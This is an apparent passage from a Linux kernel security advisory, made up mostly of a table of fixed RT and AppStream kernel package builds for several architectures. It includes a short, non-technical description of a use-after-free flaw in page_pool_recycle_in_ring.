| Unresolved product id: RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
A flaw was found in the Linux kernel. This vulnerability, known as a use-after-free (UAF), occurs in the `page_pool_recycle_in_ring` function. A local attacker could exploit this by manipulating the system's memory management, causing a freed memory region to be improperly accessed. This can lead to system instability, unauthorized access to sensitive information, or potentially allow an attacker to execute malicious code.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
